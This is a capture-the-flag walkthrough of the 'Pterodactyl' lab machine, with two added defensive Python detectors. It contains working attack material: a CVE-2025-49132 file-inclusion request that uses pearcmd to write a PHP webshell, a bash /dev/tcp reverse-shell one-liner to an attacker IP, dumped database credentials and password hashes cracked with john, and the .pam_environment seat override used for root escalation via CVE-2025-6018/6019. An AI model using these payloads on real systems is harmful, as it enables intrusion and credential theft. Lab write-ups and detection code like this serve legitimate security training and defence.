[Season10] Pterodactyl WP

Recon

Port

```
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 9.6 (protocol 2.0)
80/tcp open  http    syn-ack ttl 63 nginx 1.21.5
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.21.5
|_http-title: My Minecraft Server
```

Virtual host

Visiting the web page shows that a changelog can be viewed, and it mentions subdomain configuration, so the next step is a vhost scan:

```
ffuf -w ~/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://pterodactyl.htb -H "Host: FUZZ.pterodactyl.htb" -fc 302

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://pterodactyl.htb
 :: Wordlist         : FUZZ: /root/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.pterodactyl.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 302
________________________________________________

panel                   [Status: 200, Size: 1897, Words: 490, Lines: 36, Duration: 454ms]
```

This yields panel.pterodactyl.htb.

Web-pterodactyl

/changelog.txt

```
MonitorLand - CHANGELOG.txt
======================================

Version 1.20.X

[Added] Main Website Deployment
--------------------------------
- Deployed the primary landing site for MonitorLand.
- Implemented homepage, and link for Minecraft server.
- Integrated site styling and dark-mode as primary.

[Linked] Subdomain Configuration
--------------------------------
- Added DNS and reverse proxy routing for play.pterodactyl.htb.
- Configured NGINX virtual host for subdomain forwarding.

[Installed] Pterodactyl Panel v1.11.10
--------------------------------------
- Installed Pterodactyl Panel.
- Configured environment:
  - PHP with required extensions.
  - MariaDB 11.8.3 backend.

[Enhanced] PHP Capabilities
-------------------------------------
- Enabled PHP-FPM for smoother website handling on all domains.
- Enabled PHP-PEAR for PHP package management.
- Added temporary PHP debugging via phpinfo()
```

CVE-2025-49132 combined with PEAR to write a webshell

The vulnerability is essentially an arbitrary file inclusion: the locale and group parameters are concatenated straight into a path that is then passed to require. The changelog above also told us "Enabled PHP-PEAR for PHP package management", so we can consider using pearcmd for command execution.

```php
// Vulnerable pattern (as described in the writeup): user-controlled $locale and
// $group are concatenated into the include path with no sanitisation.
$file = 'resources/lang/' . $locale . '/' . $group . '.php';
require $file;
```

Trying 63square/CVE-2025-49132 (PoCs for CVE-2025-49132) retrieved some information:

```
Target is vulnerable!
App key: base64:UaThTPQnUjrrK61o+Luk7P9o4hM+gl4UiMJqcbTSThY=

-- Database config --
{'default': 'mysql', 'connections': {'mysql': {'driver': 'mysql', 'url': '', 'host': '127.0.0.1', 'port': '3306', 'database': 'panel', 'username': 'pterodactyl', 'password': 'PteraPanel', 'unix_socket': '', 'charset': 'utf8mb4', 'collation': 'utf8mb4_unicode_ci', 'prefix': '', 'prefix_indexes': '1', 'strict': '', 'timezone': '+00:00', 'sslmode': 'prefer', 'options': {'1014': '1'}}}, 'migrations': 'migrations', 'redis': {'client': 'predis', 'options': {'cluster': 'redis', 'prefix': 'pterodactyl_database_'}, 'default': {'scheme': 'tcp', 'path': '/run/redis/redis.sock', 'host': '127.0.0.1', 'username': '', 'password': '', 'port': '6379', 'database': '0', 'context': []}, 'sessions': {'scheme': 'tcp', 'path': '/run/redis/redis.sock', 'host': '127.0.0.1', 'username': '', 'password': '', 'port': '6379', 'database': '1', 'context': []}}}

-- Filesystem config --
{'default': 'local', 'disks': {'local': {'driver': 'local', 'root': '/var/www/pterodactyl/storage/app', 'throw': ''}, 'public': {'driver': 'local', 'root': '/var/www/pterodactyl/storage/app/public', 'url': 'http://panel.pterodactyl.htb/storage', 'visibility': 'public', 'throw': ''}, 's3': {'driver': 's3', 'key': '', 'secret': '', 'region': '', 'bucket': '', 'url': '', 'endpoint': '', 'use_path_style_endpoint': '', 'throw': ''}}, 'links': {'/var/www/pterodactyl/public/storage': '/var/www/pterodactyl/storage/app/public'}}

-- Mail config --
{'default': 'smtp', 'mailers': {'smtp': {'transport': 'smtp', 'host': 'smtp.example.com', 'port': '25', 'encryption': 'tls', 'username': '', 'password': '', 'timeout': '', 'local_domain': 'panel.pterodactyl.htb'}, 'ses': {'transport': 'ses'}, 'mailgun': {'transport': 'mailgun'}, 'postmark': {'transport': 'postmark'}, 'sendmail': {'transport': 'sendmail', 'path': '/usr/sbin/sendmail -bs -i'}, 'log': {'transport': 'log', 'channel': ''}, 'array': {'transport': 'array'}, 'failover': {'transport': 'failover', 'mailers': ['smtp', 'log']}}, 'from': {'address': 'no-reply@example.com', 'name': 'Pterodactyl Panel'}, 'markdown': {'theme': 'default', 'paths': ['/var/www/pterodactyl/resources/views/vendor/mail']}}
```

After fuzzing with an AI-generated wordlist, pearcmd.php turned out to be located under /usr/share/php/PEAR.

Write a webshell, then get a reverse shell:

```
/locales/locale.json?+config-create+/&locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd&/<?=system($_GET['cmd']);?>+/tmp/payload.php

/locales/locale.json?&locale=../../../../../../tmp&namespace=payload&cmd=bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F10%2E10%2E16%2E62%2F6666%200%3E%261
```
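As an added example that is not part of the original writeup, the following Python flags requests matching this locale-endpoint abuse in nginx access logs (traversal in locale/namespace, pearcmd argv in the query string, PHP tags); the log lines are constructed, and the nginx "combined" log format is assumed.

```python
# Added example (not from the writeup): flag abuse of the Pterodactyl locale
# endpoint (CVE-2025-49132) in nginx access logs. Log lines below are constructed.
import re
from urllib.parse import urlsplit, parse_qs, unquote

# nginx "combined" format: ip - user [time] "METHOD target HTTP/x" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# pearcmd.php reads "+"-separated argv from the query string; config-create is
# the subcommand that writes an attacker-chosen file.
PEAR_MARKERS = ("config-create", "pearcmd")

def analyse(line):
    """Return the list of rules a request triggers (empty if it looks benign)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    _ip, _ts, _method, target, _status = m.groups()
    parts = urlsplit(target)
    if not parts.path.startswith("/locales/locale.json"):
        return []
    reasons = []
    query = unquote(parts.query)
    params = parse_qs(parts.query, keep_blank_values=True)
    # locale and namespace are joined straight into a require() path by the
    # vulnerable code, so any separator or traversal in them is suspicious.
    for key in ("locale", "namespace"):
        for value in params.get(key, []):
            if ".." in value or "/" in value or "\\" in value:
                reasons.append(f"traversal in {key}={value!r}")
    if any(marker in query for marker in PEAR_MARKERS):
        reasons.append("pearcmd argv in query string")
    if "<?" in query:
        reasons.append("PHP tag in query string")
    return reasons

def scan(lines):
    """Return (client_ip, reasons) for every line that triggers at least one rule."""
    hits = []
    for line in lines:
        reasons = analyse(line)
        if reasons:
            hits.append((line.split(" ", 1)[0], reasons))
    return hits

# Constructed sample: one normal request, one pearcmd config-create request,
# one include of a file outside resources/lang.
LOGS = [
    '10.10.16.62 - - [07/Nov/2025:18:28:50 +0000] "GET /locales/locale.json?locale=en&namespace=server HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.10.16.62 - - [07/Nov/2025:18:29:01 +0000] "GET /locales/locale.json?+config-create+/&locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd HTTP/1.1" 200 1024 "-" "curl/8.5"',
    '10.10.16.62 - - [07/Nov/2025:18:29:05 +0000] "GET /locales/locale.json?locale=../../../../../../tmp&namespace=payload HTTP/1.1" 200 64 "-" "curl/8.5"',
]
```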

Got user.txt:

```
cat /home/phileasfogg3/user.txt
bdf11038c28774f26e024601d0333772
```

Check whether the database holds any account information; first enumerate the table names:

```
mysql -u pterodactyl -p'PteraPanel' -h 127.0.0.1 -D panel -e "SHOW TABLES;"

mysql: Deprecated program name. It will be removed in a future release, use '/usr/bin/mariadb' instead
Tables_in_panel
activity_log_subjects
activity_logs
allocations
api_keys
api_logs
audit_logs
backups
database_hosts
databases
egg_mount
egg_variables
eggs
failed_jobs
jobs
locations
migrations
mount_node
mount_server
mounts
nests
nodes
notifications
password_resets
recovery_tokens
schedules
server_transfers
server_variables
servers
sessions
settings
subusers
tasks
tasks_log
user_ssh_keys
users
```

Look at the users table:

```
mysql -u pterodactyl -p'PteraPanel' -h 127.0.0.1 -D panel -e "SELECT * FROM users;"

mysql: Deprecated program name. It will be removed in a future release, use '/usr/bin/mariadb' instead
id external_id uuid username email name_first name_last password remember_token language root_admin use_totp totp_secret totp_authenticated_at gravatar created_at updated_at
2 NULL 5e6d956e-7be9-41ec-8016-45e434de8420 headmonitor headmonitor@pterodactyl.htb Head Monitor $2y$10$3WJht3/5GOQmOXdljPbAJet2C6tHP4QoORy1PSj59qJrU0gdX5gD2 OL0dNy1nehBYdx9gQ5CT3SxDUQtDNrs02VnNesGOObatMGzKvTJAaO0B1zNU en 1 0 NULL NULL 1 2025-09-16 17:15:41 2025-09-16 17:15:41
3 NULL ac7ba5c2-6fd8-4600-aeb6-f15a3906982b phileasfogg3 phileasfogg3@pterodactyl.htb Phileas Fogg $2y$10$PwO0TBZA8hLB6nuSsxRqoOuXuGi3I4AVVN2IgE7mZJLzky1vGC9Pi 6XGbHcVLLV9fyVwNkqoMHDqTQ2kQlnSvKimHtUDEFvo4SjurzlqoroUgXdn8 en 0 0 NULL NULL 1 2025-09-16 19:44:19 2025-11-07 18:28:50
```

Use john to crack the hashes we obtained:

```
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
```

This gives phileasfogg3:!QAZ2wsx, so we try logging in over SSH.

Got the user flag:

```
phileasfogg3@pterodactyl:~> cat user.txt
bdf11038c28774f26e024601d0333772
```

Privilege escalation

CVE-2025-6018 & CVE-2025-6019

There are also some other service ports listening:

```
╔══════════╣ Active Ports
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports
══╣ Active Ports (ss)
tcp   LISTEN 0      512          127.0.0.1:631        0.0.0.0:*
tcp   LISTEN 0      512          127.0.0.1:9000       0.0.0.0:*
tcp   LISTEN 0      128            0.0.0.0:22         0.0.0.0:*
tcp   LISTEN 0      100          127.0.0.1:25         0.0.0.0:*
tcp   LISTEN 0      512            0.0.0.0:80         0.0.0.0:*
tcp   LISTEN 0      511          127.0.0.1:6379       0.0.0.0:*
tcp   LISTEN 0      80           127.0.0.1:3306       0.0.0.0:*
tcp   LISTEN 0      128               [::]:22            [::]:*
```

Port 631 is CUPS 2.2.7, which is not affected by the CUPS RCE n-day.

Checking the system shows it is affected by CVE-2025-6018/CVE-2025-6019:

```
phileasfogg3@pterodactyl:~> cat /etc/os-release
NAME="openSUSE Leap"
VERSION="15.6"
ID="opensuse-leap"
ID_LIKE="suse opensuse"
VERSION_ID="15.6"
PRETTY_NAME="openSUSE Leap 15.6"
ANSI_COLOR="0;32"
CPE_NAME="cpe:/o:opensuse:leap:15.6"
BUG_REPORT_URL="https://bugs.opensuse.org"
HOME_URL="https://www.opensuse.org/"
DOCUMENTATION_URL="https://en.opensuse.org/Portal:Leap"
LOGO="distributor-logo-Leap"
```

For CVE-2025-6018, after logging in, write the following:

```
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF
```
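As an added check that is not part of the original writeup, this Python parses pam_env user files and flags the XDG_SEAT/XDG_VTNR overrides that CVE-2025-6018 relies on; the sample file body is constructed, and the /home/<user>/.pam_environment layout scanned by scan_homes is assumed.

```python
# Added example (not from the writeup): parse pam_env(8) user files and flag the
# XDG_SEAT/XDG_VTNR overrides used for CVE-2025-6018. Sample text is constructed.
import re
from pathlib import Path

# pam_env user-file syntax: VARIABLE [DEFAULT=value] [OVERRIDE=value]
LINE_RE = re.compile(r'^\s*(\w+)(?:\s+(.*?))?\s*$')
ASSIGN_RE = re.compile(r'(DEFAULT|OVERRIDE)=("[^"]*"|\S*)')
# pam_systemd hands these to logind when registering the session, so forcing them
# makes a remote SSH login look like a local "active" seat to polkit allow_active rules.
SEAT_VARS = {"XDG_SEAT", "XDG_VTNR"}

def parse_pam_environment(text):
    """Return {VAR: {"DEFAULT": ..., "OVERRIDE": ...}} for a .pam_environment body."""
    env = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0]          # strip comments
        m = LINE_RE.match(line)
        if not m:
            continue                          # blank or malformed line
        var, rest = m.group(1), m.group(2) or ""
        env[var] = {k: v.strip('"') for k, v in ASSIGN_RE.findall(rest)}
    return env

def seat_overrides(text):
    """Names of session-placement variables the file actually assigns a value to."""
    env = parse_pam_environment(text)
    return sorted(v for v in env if v in SEAT_VARS and env[v])

def scan_homes(home_root="/home"):
    """Map user -> offending variables for every <home_root>/*/.pam_environment."""
    findings = {}
    for f in Path(home_root).glob("*/.pam_environment"):
        hits = seat_overrides(f.read_text(errors="replace"))
        if hits:
            findings[f.parent.name] = hits
    return findings

# Constructed sample mirroring the file written in the writeup, plus a benign entry.
SAMPLE = "XDG_SEAT OVERRIDE=seat0\nXDG_VTNR OVERRIDE=1\nLANG DEFAULT=C.UTF-8\n"
```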

Build a malicious XFS filesystem image locally and use guinea-offensive-security/CVE-2025-6019 to escalate privileges:

```
bash-5.1# id
uid=1002(phileasfogg3) gid=100(users) euid=0(root) groups=100(users)
bash-5.1# cat /root/root.txt
743457eefd923f2e830a5029cd76b011
```

Hash
